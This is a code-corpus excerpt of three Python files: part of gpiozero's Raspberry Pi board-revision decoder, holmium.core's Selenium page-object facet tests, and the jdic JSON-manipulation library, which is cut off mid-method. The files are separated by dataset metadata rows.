.. automethod:: pprint
.. automethod:: pulled_up
.. attribute:: revision
A string indicating the revision of the Pi. This is unique to each
revision and can be considered the "key" from which all other
attributes are derived. However, in itself the string is fairly
meaningless.
.. attribute:: model
A string containing the model of the Pi (for example, "B", "B+", "A+",
"2B", "CM" (for the Compute Module), or "Zero").
.. attribute:: pcb_revision
A string containing the PCB revision number which is silk-screened onto
the Pi (on some models).
.. note::
This is primarily useful to distinguish between the model B
revision 1.0 and 2.0 (not to be confused with the model 2B) which
had slightly different pinouts on their 26-pin GPIO headers.
.. attribute:: released
A string containing an approximate release date for this revision of
the Pi (formatted as yyyyQq, e.g. 2012Q1 means the first quarter of
2012).
.. attribute:: soc
A string indicating the SoC (`system on a chip`_) that this revision
of the Pi is based upon.
.. attribute:: manufacturer
A string indicating the name of the manufacturer (usually "Sony" but a
few others exist).
.. attribute:: memory
An integer indicating the amount of memory (in Mb) connected to the
SoC.
.. note::
This can differ substantially from the amount of RAM available
to the operating system as the GPU's memory is shared with the
CPU. When the camera module is activated, at least 128Mb of RAM
is typically reserved for the GPU.
.. attribute:: storage
A string indicating the type of bootable storage used with this
revision of Pi, e.g. "SD", "MicroSD", or "eMMC" (for the Compute
Module).
.. attribute:: usb
An integer indicating how many USB ports are physically present on
this revision of the Pi.
.. note::
This does *not* include the micro-USB port used to power the Pi.
.. attribute:: ethernet
An integer indicating how many Ethernet ports are physically present
on this revision of the Pi.
.. attribute:: wifi
A bool indicating whether this revision of the Pi has wifi built-in.
.. attribute:: bluetooth
A bool indicating whether this revision of the Pi has bluetooth
built-in.
.. attribute:: csi
An integer indicating the number of CSI (camera) ports available on
this revision of the Pi.
.. attribute:: dsi
An integer indicating the number of DSI (display) ports available on
this revision of the Pi.
.. attribute:: headers
A dictionary which maps header labels to :class:`HeaderInfo` tuples.
For example, to obtain information about header P1 you would query
``headers['P1']``. To obtain information about pin 12 on header J8 you
would query ``headers['J8'].pins[12]``.
A rendered version of this data can be obtained by using the
:class:`PiBoardInfo` object in a format string::
from gpiozero import *
print('{0:headers}'.format(pi_info()))
.. attribute:: board
An ASCII art rendition of the board, primarily intended for console
pretty-print usage. A more usefully rendered version of this data can
be obtained by using the :class:`PiBoardInfo` object in a format
string. For example::
from gpiozero import *
print('{0:board}'.format(pi_info()))
.. _system on a chip: https://en.wikipedia.org/wiki/System_on_a_chip
"""
__slots__ = () # workaround python issue #24931
@classmethod
def from_revision(cls, revision):
if revision & 0x800000:
# New-style revision, parse information from bit-pattern:
#
# MSB -----------------------> LSB
# uuuuuuuuFMMMCCCCPPPPTTTTTTTTRRRR
#
# uuuuuuuu - Unused
# F - New flag (1=valid new-style revision, 0=old-style)
# MMM - Memory size (0=256, 1=512, 2=1024)
# CCCC - Manufacturer (0=Sony, 1=Egoman, 2=Embest, 3=Sony Japan)
# PPPP - Processor (0=2835, 1=2836, 2=2837)
# TTTTTTTT - Type (0=A, 1=B, 2=A+, 3=B+, 4=2B, 5=Alpha (??), 6=CM,
# 8=3B, 9=Zero, 10=CM3, 12=Zero W)
# RRRR - Revision (0, 1, 2, etc.)
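            # Example (illustrative decode): 0xa02082 has F=1 (new-style),
            # MMM=2 (1024MB), CCCC=0 (Sony), PPPP=2 (BCM2837), TTTTTTTT=8 (3B)
            # and RRRR=2, i.e. a Raspberry Pi 3B, PCB revision 1.2.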
revcode_memory = (revision & 0x700000) >> 20
revcode_manufacturer = (revision & 0xf0000) >> 16
revcode_processor = (revision & 0xf000) >> 12
revcode_type = (revision & 0xff0) >> 4
revcode_revision = (revision & 0x0f)
try:
model = {
0: 'A',
1: 'B',
2: 'A+',
3: 'B+',
4: '2B',
6: 'CM',
8: '3B',
9: 'Zero',
10: 'CM3',
12: 'Zero W',
}.get(revcode_type, '???')
if model in ('A', 'B'):
pcb_revision = {
0: '1.0', # is this right?
1: '1.0',
2: '2.0',
}.get(revcode_revision, 'Unknown')
else:
pcb_revision = '1.%d' % revcode_revision
soc = {
0: 'BCM2835',
1: 'BCM2836',
2: 'BCM2837',
}.get(revcode_processor, 'Unknown')
manufacturer = {
0: 'Sony',
1: 'Egoman',
2: 'Embest',
3: 'Sony Japan',
}.get(revcode_manufacturer, 'Unknown')
memory = {
0: 256,
1: 512,
2: 1024,
}.get(revcode_memory, None)
released = {
'A': '2013Q1',
'B': '2012Q1' if pcb_revision == '1.0' else '2012Q4',
'A+': '2014Q4' if memory == 512 else '2016Q3',
'B+': '2014Q3',
'2B': '2015Q1' if pcb_revision in ('1.0', '1.1') else '2016Q3',
'CM': '2014Q2',
'3B': '2016Q1' if manufacturer in ('Sony', 'Embest') else '2016Q4',
'Zero': '2015Q4' if pcb_revision == '1.2' else '2016Q2',
'CM3': '2017Q1',
'Zero W': '2017Q1',
}.get(model, 'Unknown')
storage = {
'A': 'SD',
'B': 'SD',
'CM': 'eMMC',
'CM3': 'eMMC / off-board',
}.get(model, 'MicroSD')
usb = {
'A': 1,
'A+': 1,
'Zero': 1,
'Zero W': 1,
'B': 2,
'CM': 0,
'CM3': 1,
}.get(model, 4)
ethernet = {
'A': 0,
'A+': 0,
'Zero': 0,
'Zero W': 0,
'CM': 0,
'CM3': 0,
}.get(model, 1)
wifi = {
'3B': True,
'Zero W': True,
}.get(model, False)
bluetooth = {
'3B': True,
'Zero W': True,
}.get(model, False)
csi = {
'Zero': 0 if pcb_revision == '1.0' else 1,
'Zero W': 1,
'CM': 2,
'CM3': 2,
}.get(model, 1)
dsi = {
'Zero': 0,
'Zero W': 0,
}.get(model, csi)
headers = {
'A': {'P1': REV2_P1, 'P5': REV2_P5},
'B': {'P1': REV1_P1} if pcb_revision == '1.0' else {'P1': REV2_P1, 'P5': REV2_P5},
'CM': {'SODIMM': CM_SODIMM},
'CM3': {'SODIMM': CM3_SODIMM},
}.get(model, {'J8': PLUS_J8})
board = {
'A': A_BOARD,
'B': REV1_BOARD if pcb_revision == '1.0' else REV2_BOARD,
'A+': APLUS_BOARD,
'CM': CM_BOARD,
'CM3': CM_BOARD,
'Zero': ZERO12_BOARD if pcb_revision == '1.2' else ZERO13_BOARD,
'Zero W': ZERO13_BOARD,
}.get(model, BPLUS_BOARD)
except KeyError:
raise PinUnknownPi('unable to parse new-style revision "%x"' % revision)
else:
# Old-style revision, use the lookup table
try:
(
model,
pcb_revision,
released,
soc,
manufacturer,
memory,
storage,
usb,
ethernet,
wifi,
bluetooth,
csi,
dsi,
headers,
board,
) = PI_REVISIONS[revision]
except KeyError:
raise PinUnknownPi('unknown old-style revision "%x"' % revision)
headers = {
header: HeaderInfo(name=header, rows=max(header_data) // 2, columns=2, pins={
number: PinInfo(
number=number, function=function, pull_up=pull_up,
row=row + 1, col=col + 1)
for number, (function, pull_up) in header_data.items()
for row, col in (divmod(number, 2),)
})
for header, header_data in headers.items()
}
return cls(
'%04x' % revision,
model,
pcb_revision,
released,
soc,
manufacturer,
memory,
storage,
usb,
ethernet,
wifi,
bluetooth,
csi,
dsi,
headers,
board,
)
def physical_pins(self, function):
"""
Return the physical pins supporting the specified *function* as tuples
of ``(header, pin_number)`` where *header* is a string specifying the
header containing the *pin_number*. Note that the return value is a
:class:`set` which is not indexable. Use :func:`physical_pin` if you
are expecting a single return value.
:param str function:
The pin function you wish to search for. Usually this is something
like "GPIO9" for Broadcom GPIO pin 9, or "GND" for all the pins
connecting to electrical ground.
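        For example (the pin numbers shown are a sketch for a 40-pin board)::
            pi_info().physical_pins('GND')
            # e.g. {('J8', 6), ('J8', 9), ('J8', 14), ...}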
"""
return {
(header, pin.number)
for (header, info) in self.headers.items()
for pin in info.pins.values()
if pin.function == function
}
def physical_pin(self, function):
"""
Return the physical pin supporting the specified *function*. If no pins
support the desired *function*, this function raises :exc:`PinNoPins`.
If multiple pins support the desired *function*, :exc:`PinMultiplePins`
will be raised (use :func:`physical_pins` if you expect multiple pins
in the result, such as for electrical ground).
:param str function:
The pin function you wish to search for. Usually this is something
like "GPIO9" for Broadcom GPIO pin 9.
"""
result = self.physical_pins(function)
if len(result) > 1:
raise PinMultiplePins('multiple pins can be used for %s' % function)
elif result:
return result.pop()
else:
raise PinNoPins('no pins can be used for %s' % function)
def pulled_up(self, function):
"""
Returns a bool indicating whether a physical pull-up is attached to
the pin supporting the specified *function*. Either :exc:`PinNoPins`
or :exc:`PinMultiplePins` may be raised if the function is not
associated with a single pin.
:param str function:
The pin function you wish to determine pull-up for. Usually this is
something like "GPIO9" for Broadcom GPIO pin 9.
"""
try:
header, number = self.physical_pin(function)
except PinNoPins:
return False
else:
return self.headers[header].pins[number].pull_up
def __repr__(self):
return '{cls}({fields})'.format(
cls=self.__class__.__name__,
fields=', '.join(
(
'{name}=...' if name in ('headers', 'board') else
'{name}={value!r}').format(name=name, value=value)
for name, value in zip(self._fields, self)
)
)
def __format__(self, format_spec):
style, content = Style.from_style_content(format_spec)
if content == 'full':
return dedent("""\
{self:{style} board}
{self:{style} specs}
{self:{style} headers}"""
).format(self=self, style=style)
elif content == 'board':
kw = self._asdict()
kw.update({
name: header
for name, header in self.headers.items()
})
return self.board.format(style=style, **kw)
elif content == 'specs':
return dedent("""\
{style:bold}Revision {style:reset}: {revision}
{style:bold}SoC {style:reset}: {soc}
{style:bold}RAM {style:reset}: {memory}Mb
{style:bold}Storage {style:reset}: {storage}
{style:bold}USB ports {style:reset}: {usb} {style:yellow}(excluding power){style:reset}
{style:bold}Ethernet ports {style:reset}: {ethernet}
{style:bold}Wi-fi {style:reset}: {wifi}
{style:bold}Bluetooth {style:reset}: {bluetooth}
{style:bold}Camera ports (CSI) {style:reset}: {csi}
{style:bold}Display ports (DSI){style:reset}: {dsi}"""
).format(style=style, **self._asdict())
elif content == 'headers':
return '\n\n'.join(
dedent("""\
{style:bold}{header.name}{style:reset}:
{header:{style} full}"""
).format(header=header, style=style)
for header in sorted(self.headers.values(), key=attrgetter('name'))
)
def pprint(self, color=None):
"""
Pretty-print a representation of the board along with header diagrams.
If *color* is ``None`` (the default), the diagram will include ANSI
color codes if stdout is a color-capable terminal. Otherwise *color*
can be set to ``True`` or ``False`` to force color or monochrome
output.
"""
print('{0:{style} full}'.format(self, style=Style(color)))
def pi_info(revision=None):
"""
Returns a :class:`PiBoardInfo` instance containing information about a
*revision* of the Raspberry Pi.
:param str revision:
The revision of the Pi to return information about. If this is omitted
or ``None`` (the default), then the library will attempt to determine
the model of Pi it is running on and return information about that.
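    For example (the revision code below is only an illustration)::
        from gpiozero import *
        info = pi_info('a02082')
        print(info.model)    # '3B' for this particular code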
"""
if revision is None:
# The reason this import is located here is to avoid a circular
# dependency; devices->pins.local->pins.data->devices
from ..devices import Device
result = Device.pin_factory.pi_info
if result is None:
raise PinUnknownPi('The default pin_factory is not attached to a Pi')
else:
return result
else:
if isinstance(revision, bytes):
revision = revision.decode('ascii')
if isinstance(revision, str):
revision = int(revision, base=16)
else:
# be nice to people passing an int (or something numeric anyway)
revision = int(revision)
return PiBoardInfo.from_revision(revision)
| bsd-3-clause | -1,324,905,326,528,842,200 | 45.297321 | 212 | 0.501251 | false |
jlecount-sungevity/holmium.core | tests/facet_tests.py | 1 | 8107 | """
tests for facets
"""
import unittest
from flask_testing import LiveServerTestCase
import mock
from holmium.core import Page, Element, Locators, Elements, Section, ElementMap
from holmium.core.facets import FacetError, defer, title, cookie, strict
from holmium.core.pageobject import NonexistentElement
from . import webapp
from tests.utils import get_driver
class LiveTest(LiveServerTestCase):
def create_app(self):
return webapp.create_app()
def setUp(self):
super(LiveTest, self).setUp()
webapp.db.create_db()
@strict()
class NavSection(Section):
links = Elements(Locators.CSS_SELECTOR, "ul>li")
@strict()
class BadNavSectionStrict(Section):
links = Elements(Locators.CSS_SELECTOR, "ul>li")
junk = Element(Locators.CLASS_NAME, "junk")
@strict(debug=True)
class BadNavSectionStrictDebug(Section):
links = Elements(Locators.CSS_SELECTOR, "ul>li")
junk = Element(Locators.CLASS_NAME, "junk")
class BadNavSection(Section):
links = Elements(Locators.CSS_SELECTOR, "ul>bi", facet=True)
class JumboTron(Section):
callout = Element(Locators.TAG_NAME, "h1")
link = Element(Locators.CLASS_NAME, "btn")
class BasePage(Page):
nav = NavSection(Locators.CLASS_NAME, "nav")
jumbo = JumboTron(Locators.CLASS_NAME, "jumbotron")
@title(title="login")
class LoginPage(BasePage):
email = Element(Locators.NAME, "email", facet=True)
password = Element(Locators.NAME, "password", facet=True)
submit = Element(Locators.ID, "login-submit", facet=True)
def login(self, email, password):
self.email.send_keys(email)
self.password.send_keys(password)
self.submit.click()
@title(title="main page")
@cookie(name="uid")
@defer(page=LoginPage,
action=LoginPage.login,
action_arguments={"email": "[email protected]",
"password": "sekret"},
required=False)
class MainPage(BasePage):
references = ElementMap ( Locators.CLASS_NAME, "reference-link")
reference_content = Element(Locators.ID, "reference-content")
selenium = Element(Locators.LINK_TEXT, "Selenium", timeout=5)
def do_login(page, email, password):
page.login(email, password)
@title(title="main page")
@cookie(name="uid")
@defer(page=LoginPage,
action=do_login,
action_arguments={"email": "[email protected]",
"password": "sekret"},
required=True)
class MainPageWithCallable(BasePage):
references = ElementMap ( Locators.CLASS_NAME, "reference-link")
reference_content = Element(Locators.ID, "reference-content")
selenium = Element(Locators.LINK_TEXT, "Selenium", timeout=5)
class MainPageBadElement(BasePage):
bad_element = Element(Locators.NAME, "bad_element", facet=True)
class MainPageBadSectionElement(BasePage):
nav = BadNavSection(Locators.CLASS_NAME, "nav")
class MainPageMixedSection(BasePage):
bad_nav = BadNavSection(Locators.CLASS_NAME, "nav")
class FacetsTests(LiveTest):
def setUp(self):
super(FacetsTests, self).setUp()
self.driver = get_driver()
self.base_url = self.get_server_url()
def test_main_page_callout(self):
main = MainPage(self.driver, self.base_url)
self.assertEqual(main.jumbo.callout.text, "Here's a few ways it can be good")
def test_main_page_with_callable_callout(self):
main = MainPageWithCallable(self.driver, self.base_url)
self.assertEqual(main.jumbo.callout.text, "Here's a few ways it can be good")
def test_main_click_selenium(self):
main = MainPage(self.driver, self.base_url)
main.selenium.click()
self.assertTrue("Selenium automates browsers." in main.reference_content.text)
def test_main_page_login_first(self):
login = LoginPage(self.driver, self.base_url + "/login")
login.login("[email protected]", "sekret")
main = MainPage(self.driver, self.base_url)
self.assertEqual(main.jumbo.callout.text, "Here's a few ways it can be good")
def test_main_page_bad_trait_element(self):
main = MainPageBadElement(self.driver, self.base_url)
self.assertRaises(FacetError, lambda:main.jumbo)
def test_main_page_bad_section_element(self):
main = MainPageBadSectionElement(self.driver, self.base_url)
self.assertRaises(FacetError, lambda: main.nav.links)
def test_main_page_bad_section_strict(self):
class _P(MainPage):
bad_nav = BadNavSectionStrict(Locators.CLASS_NAME, "nav")
main = _P(self.driver, self.base_url)
self.assertRaises(FacetError, lambda: main.bad_nav.links)
self.assertTrue( main.nav.links is not None)
def test_main_page_bad_section_strict_debug(self):
class _P(MainPage):
bad_nav = BadNavSectionStrictDebug(Locators.CLASS_NAME, "nav")
main = _P(self.driver, self.base_url)
with mock.patch("holmium.core.facets.log") as log:
self.assertTrue( main.bad_nav.links is not None)
self.assertTrue( main.bad_nav.junk is NonexistentElement())
self.assertTrue( main.nav.links is not None)
self.assertTrue(log.warn.call_count == 1)
self.assertTrue("failed to exhibit facet junk" in str(log.warn.call_args))
def test_main_page_good_and_bad_section_element(self):
main = MainPageMixedSection(self.driver, self.base_url)
self.assertRaises(FacetError, lambda: main.bad_nav.links)
self.assertTrue( main.nav.links is not None)
def tearDown(self):
super(FacetsTests, self).tearDown()
class GoodFacetsTest(unittest.TestCase):
def test_all(self):
class Other(Page):
def do(self):
return
@title(title="title")
@cookie(name="cookie", value="yum")
@cookie(name="cookie", value=lambda c:c=="yum")
@defer(page=Other, action=Other.do)
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
driver.find_element.return_value.text = "null"
driver.get_cookie.return_value = "yum"
driver.title = "title"
p = P(driver)
self.assertEqual(p.el.text, "null")
class BadFacetTests(unittest.TestCase):
def test_missing_title(self):
@title(title="foo")
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
p = P(driver)
self.assertRaises(FacetError, lambda: p.el)
def test_failed_callable(self):
@cookie(name="foo", value=lambda c:c==1)
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
driver.get_cookie.return_value = 2
p = P(driver)
self.assertRaises(FacetError, lambda: p.el)
class BadReactionTests(unittest.TestCase):
def test_failed_reaction_required(self):
class Other(Page):
def do(self):
raise Exception("can't")
@defer(page=Other, action=Other.do)
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
p = P(driver)
self.assertRaises(FacetError, lambda: p.el)
def test_passed_reaction_notrequired(self):
class Other(Page):
def do(self):
raise Exception("can't")
@defer(page=Other, action=Other.do, required=False)
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
driver.find_element.return_value.text = "null"
p = P(driver)
self.assertEqual(p.el.text, "null")
def test_missing_arguments():
for args in [{}, {"page":1}, {"page":1, "action":1, "foobar":1}]:
yield check_arguments, args
def check_arguments(args):
def create(**kw):
@defer(**kw)
class P(Page):
pass
try:
create(**args)
raise Exception("exception not raised")
except AttributeError as e:
pass
| mit | 386,016,274,215,468,740 | 32.639004 | 86 | 0.63735 | false |
kerfab/jdic | jdic/jdic.py | 1 | 21228 | """
The Jdic module provides the features required to manipulate
JSON objects through a consistent API.
"""
from __future__ import unicode_literals
import json
import hashlib
import importlib
from collections import Sequence, Mapping
import json_delta
import jsonschema
from . import drivers # pylint: disable=unused-import
from . import settings
JSON_ITERABLES = [
Mapping,
Sequence
]
JSON_LEAVES = [
str,
int,
float,
bool,
type(None)
]
class MatchResult(object):
""" Wraps the results of searches and browses within Jdic objects """
# pylint: disable=too-few-public-methods
def __init__(self, **kwargs):
self._obj = {}
for k in kwargs:
setattr(self, k, kwargs[k])
self._obj[k] = kwargs[k]
def __str__(self):
return str(self._obj)
def __iter__(self):
yield from self._obj.__iter__()
def __getitem__(self, item):
return self._obj[item]
class Jdic(object):
"""
    The Jdic class provides the operations needed to crawl or manipulate JSON data objects.
    Do not instantiate this class directly; use the instantiation wrapper function `jdic()` instead.
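    A minimal sketch with hypothetical data (plain key access mirrors the
    wrapped structure; path-style lookups depend on the configured driver)::
        d = jdic_create({'user': {'name': 'ada'}})
        d['user']['name']    # 'ada'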
"""
# pylint: disable=too-many-instance-attributes
_attr_whitelist = [
'count',
'index',
'copy',
'fromkeys',
'keys',
'items',
'values'
]
##
# CLASS OPERATORS
##
def __init__(self, iterable, schema=None, serializer=None, driver=None,
_parent=None, _key=None):
""" Instantiates a Generic Jdic object.
iterable: the core data to be contained within a Jdic (usually dict or list)
schema: a JSON schema which may be used for automatic validation of data
serializer: a function which might be used for custom-made data-to-JSON serialization
driver: the class which implements the driver features
_parent: used internally to attach a new Jdic to another. Within a JSON hierarchy all
iterables are Jdic objects.
_key: used internally to indicate under which key (or index) the new Jdic is attached
within its parent.
"""
# pylint: disable=protected-access
self._parent = _parent
self._key = _key
# Load / Inherit driver first
if self._parent is None:
self._driver_name = driver if driver else settings.json_path_driver
self._driver = None
else:
self._driver_name = self._parent._driver_name if driver is None else driver
self._driver = self._parent._driver if driver is None else None
if self._driver is None:
self._driver = importlib.import_module('.'+self._driver_name, 'jdic.drivers').Driver()
# Inherit parent or constructor properties
if self._parent is None:
self._path = self._driver.get_new_path()
self._serializer = serializer
self._depth = 0
else:
self._path = self._driver.add_to_path(self._parent._path, self._key)
self._serializer = self._parent._serializer if serializer is None else serializer
self._depth = self._parent._depth + 1
self._schema = schema
self._cache = {}
# Dereference or cast to strict Json
if isinstance(iterable, Jdic):
iterable = iterable._obj
self._obj = self._serialize_to_jdic(iterable, parent=self)
if self._schema:
self.validate(self._schema)
def __copy__(self):
return self.new()
def __deepcopy__(self, _):
return self.new()
def __delitem__(self, path):
# pylint: disable=protected-access
if self._driver.is_root_path(path):
if isinstance(self._obj, Mapping):
self._obj = {}
else:
self._obj = []
self._flag_modified()
return
if self._driver.is_a_path(path):
parents = self._driver.get_parent(self._obj, path)
else:
parents = [(self, path)]
for parent, key in parents:
del parent._obj[key]
parent._flag_modified()
def __eq__(self, obj):
if isinstance(obj, Jdic):
return self.checksum() == obj.checksum()
elif self._is_iterable(obj):
return self.checksum() == jdic_create(obj).checksum()
return False
    def __getattr__(self, attr):
        # Attribute access is delegated to the wrapped object; anything not in
        # the read-only whitelist is assumed to mutate it, so invalidate the
        # cache first.
        if attr not in self._attr_whitelist:
            self._flag_modified()
        return getattr(self._obj, attr)
def __getitem__(self, item):
if self._driver.is_root_path(item):
return self
if self._driver.is_a_path(item):
return self._driver.get_value_at_path(self._obj, item)
if isinstance(self._obj, Mapping):
return self._obj[str(item)]
return self._obj[int(item)]
def __iter__(self):
yield from self._obj.__iter__()
def __len__(self):
return len(self._obj)
def __setitem__(self, path, value):
# pylint: disable=protected-access
if self._driver.is_root_path(path):
if not self._is_iterable(value):
raise ValueError('Cannot reassign object to non iterable "{}"'.format(type(value)))
self._jdic_reload(value)
if self._driver.is_a_path(path):
parents = self._driver.get_parent(self._obj, path)
else:
parents = [(self, path)]
for parent, key in parents:
if self._is_iterable(value):
value = jdic_create(value, _parent=parent, _key=key)
parent._obj[key] = value
parent._flag_modified()
def __str__(self):
return self.json(sort_keys=settings.json_dump_sort_keys,
indent=settings.json_dump_indent, ensure_ascii=False)
__repr__ = __str__
##
# UNDERLYING FUNCTIONS
##
def _flag_modified(self):
# pylint: disable=protected-access
self._cache = {}
if self._parent is not None:
self._parent._flag_modified()
if self._schema:
self.validate(self._schema)
def _input_serialize(self, obj):
if self._serializer:
obj = self._serializer(obj)
elif callable(settings.serialize_custom_function):
# pylint: disable=not-callable
obj = settings.serialize_custom_function(obj)
if isinstance(obj, float) and settings.serialize_float_to_int and int(obj) == obj:
return int(obj)
if self._is_json_leaf(obj):
return obj
if isinstance(obj, Mapping):
return dict(obj)
elif isinstance(obj, Sequence):
return list(obj)
return str(obj)
def _is_iterable(self, obj):
if self._is_json_leaf(obj):
return False
for itype in JSON_ITERABLES:
if isinstance(obj, itype):
return True
return False
@staticmethod
def _is_json_leaf(obj):
""" True for int, float, str, bool, None """
for ltype in JSON_LEAVES:
if isinstance(obj, ltype):
return True
return False
@staticmethod
def _is_limit_reached(number, limit):
""" Helper function """
if limit is None:
return False
if limit < 0:
return False
if limit >= number:
return True
def _jdic_reload(self, obj):
# pylint: disable=protected-access
if isinstance(obj, Jdic):
obj = obj._obj
self._obj = self._serialize_to_jdic(obj, parent=self)
self._flag_modified()
@staticmethod
def _keys_in(obj, keys, mode):
""" Helper function """
if not isinstance(obj, Mapping):
return False
if mode == "any":
for key in keys:
if key in obj:
return True
return False
elif mode == "all":
for key in keys:
if key not in obj:
return False
return True
raise NotImplementedError(mode)
def _match(self, obj, query):
return self._driver.match(obj, query)
def _merge(self, obj, with_obj, arr_mode="replace"):
# pylint: disable=protected-access
if isinstance(obj, Jdic):
obj = obj._obj
if isinstance(with_obj, Jdic):
with_obj = with_obj._obj
if not self._is_iterable(obj) or not self._is_iterable(with_obj):
raise TypeError('Cannot merge {} with {}'.format(type(obj), type(with_obj)))
unique_t = self._unique_type(obj, with_obj)
if not unique_t:
return with_obj
if unique_t and isinstance(obj, Mapping):
obj = self._merge_dicts(obj, with_obj, arr_mode)
else:
obj = self._merge_arrays(obj, with_obj, arr_mode)
return obj
def _merge_arrays(self, arr, with_arr, mode="replace"):
if mode == "replace":
return with_arr
if mode == "append":
return arr + with_arr
if mode == "new":
for val in with_arr:
if val not in arr:
arr.append(val)
return arr
if mode == "merge":
arr_l = len(arr)
for index, val in enumerate(with_arr):
if index >= arr_l:
arr.append(val)
else:
if self._is_iterable(arr[index]) and self._is_iterable(with_arr[index]):
arr[index] = self._merge(arr[index], with_arr[index], mode)
else:
arr[index] = with_arr[index]
return arr
raise NotImplementedError('Merge array mode "{}" not implemented'.format(mode))
def _merge_dicts(self, dic, with_dic, arr_mode):
for k in with_dic:
if k not in dic:
dic[k] = with_dic[k]
else:
if self._is_iterable(dic[k]) and self._is_iterable(with_dic[k]):
dic[k] = self._merge(dic[k], with_dic[k], arr_mode)
else:
dic[k] = with_dic[k]
return dic
def _serialize_to_jdic(self, iterable, parent=None):
if isinstance(iterable, Mapping):
iterable = dict(iterable)
elif isinstance(iterable, Sequence):
iterable = list(iterable)
res = type(iterable)()
for key, val in jdic_enumerate(iterable):
if isinstance(res, dict):
key = str(key)
val = self._input_serialize(val)
if self._is_iterable(val):
val = jdic_create(val, _parent=parent, _key=key)
if isinstance(res, dict):
res[key] = val
else:
res.append(val)
return res
@staticmethod
def _unique_type(*args):
result = None
for val in args:
type_val = type(val)
if not result:
result = type_val
elif result != type_val:
return None
return result
##
# PUBLIC FUNCTIONS
##
def browse(self, sort=False, depth=None, maxdepth=None, _start=True):
"""
Iterates on each JSON entry in a recursive fashion
Arguments:
- sort: bool. If True keys in dicts are alphabetically sorted before values are yielded.
- depth: an integer between 0 and +inf. Results are only yielded at this depth.
- maxdepth: an integer between 0 and +inf. Results won't be yielded past this depth.
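        A sketch with hypothetical data::
            for match in jdic_create({'a': {'b': 1}}).browse():
                print(match.path, match.key, match.value)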
"""
# pylint: disable=protected-access
if maxdepth is not None and maxdepth >= 0 and self._depth > maxdepth:
return
if depth is not None and self._depth > depth:
return
parent_path = None if self._parent is None else self._parent._path
if depth is None and _start:
yield MatchResult(parent=self._parent, parent_path=parent_path, key=self._key,
value=self, path=self._path, depth=self._depth)
for key, val in jdic_enumerate(self._obj, sort=sort):
path = self._driver.add_to_path(self._path, key)
if depth is None or depth == self._depth:
yield MatchResult(parent=self, parent_path=self._path, key=key,
value=val, path=path, depth=self._depth)
if isinstance(val, Jdic):
yield from val.browse(sort=sort, depth=depth, maxdepth=maxdepth, _start=False)
def checksum(self, algo='sha256'):
""" Returns an ASCII hexadecimal checksum representing the state of the object """
if 'checksum' in self._cache:
return self._cache['checksum']
hash_ = hashlib.new(algo)
hash_.update(type(self._obj).__name__.encode('utf-8'))
for key, val in jdic_enumerate(self._obj, sort=True):
if isinstance(val, Jdic):
data = "{}:{}:{}:{}".format(type(key).__name__, key,
type(val).__name__, val.checksum())
else:
data = "{}:{}:{}:{}".format(type(key).__name__, key,
type(val).__name__, val)
hash_.update(data.encode('utf-8'))
checksum = hash_.hexdigest()
self._cache['checksum'] = checksum
return checksum
def deepness(self):
""" Returns an integer representing how deep the Jdic object is """
if 'deepness' in self._cache:
return self._cache['deepness']
deepness = 0
for val in self.browse():
if isinstance(val.value, Jdic):
depth = val.value.depth()
if depth > deepness:
deepness = depth
self._cache['deepness'] = deepness
return deepness
def depth(self):
""" Returns an integer representing the depth of the current Jdic object """
return self._depth
def diff(self, obj):
""" Returns a delta between this object and obj """
if isinstance(obj, Jdic):
obj = obj.raw()
return json_delta.diff(self.raw(), obj, verbose=False)
def enumerate(self, sort=False):
""" Yields a key, value pair with both Jdic Mappings and Sequences """
yield from jdic_enumerate(self._obj, sort=sort)
def find(self, value, limit=None, sort=False, depth=None, maxdepth=None):
""" Finds a value within the Jdic object, the search is recursive """
# pylint: disable=too-many-arguments
if limit == 0:
return
num = 0
for res in self.browse(sort=sort, depth=depth, maxdepth=maxdepth):
if res.value == value:
yield res
num += 1
if self._is_limit_reached(num, limit):
return
def find_keys(self, keys, mode="any", sort=False,
limit=None, depth=None, maxdepth=None):
""" Find one or multiple keys within the Jdic object """
# pylint: disable=too-many-arguments
if limit is not None and limit == 0:
return
if not isinstance(keys, list):
keys = [keys]
num = 0
for match in self.browse(sort=sort, depth=depth, maxdepth=maxdepth):
if isinstance(match.value, Jdic):
if self._keys_in(match.value, keys, mode):
yield match
num += 1
if limit is not None and limit == num:
return
def find_match(self, query, sort=False, limit=None, depth=None, maxdepth=None):
""" Find inner data which match the provided query """
# pylint: disable=too-many-arguments
        if limit == 0 or maxdepth == 0:
return
num = 0
for res in self.browse(sort=sort, depth=depth, maxdepth=maxdepth):
if self._match(res.value, query):
yield res
num += 1
if self._is_limit_reached(num, limit):
break
def json(self, sort_keys=False, indent=0, ensure_ascii=False):
""" Returns a string of the object in JSON format """
return json.dumps(self.raw(), sort_keys=sort_keys,
indent=indent, ensure_ascii=ensure_ascii)
def leaves(self, sort=False, depth=None, maxdepth=None):
""" Iterates recursively, raises leaves of the object only """
for res in self.browse(sort=sort, depth=depth, maxdepth=maxdepth):
if self._is_json_leaf(res.value):
yield res
def nb_leaves(self):
""" Return an integer, the number of leaves within the Jdic object """
if 'nb_leaves' in self._cache:
return self._cache['nb_leaves']
nb_leaves = 0
for _ in self.leaves():
nb_leaves += 1
self._cache['nb_leaves'] = nb_leaves
return nb_leaves
def match(self, query):
""" Returns True if the object matches against query, False otherwise """
return self._match(self._obj, query)
def merge(self, objs, arr_mode="replace"):
""" Make a deep merge of the current Jdic object with one or more objects """
if not isinstance(objs, list):
objs = [objs]
for with_obj in objs:
if (isinstance(with_obj, Mapping) and not isinstance(self._obj, Mapping)) or\
(not isinstance(with_obj, Mapping) and isinstance(self._obj, Mapping)):
raise TypeError('Cannot merge "{}" with "{}"'.format(
type(self._obj),
type(with_obj)))
result = self._merge(self._obj, with_obj, arr_mode)
self._jdic_reload(result)
return self
def new(self, _obj=None):
""" Returns a copy of the current object """
if _obj is None:
_obj = self._obj
return jdic_create(_obj, serializer=self._serializer,
driver=self._driver_name, schema=self._schema)
def parent(self, generation=1):
""" Returns the Jdic object parent of this object """
# pylint: disable=protected-access
if generation < 1:
return None
res = self._parent
while generation > 1 and res is not None:
res = res._parent
generation = generation - 1
return res
def patch(self, diff):
""" Takes a delta (from diff()) and applies it to update the object """
if not diff:
return
res = json_delta.patch(self.raw(), diff)
if self._is_iterable(res):
return self.new(res)
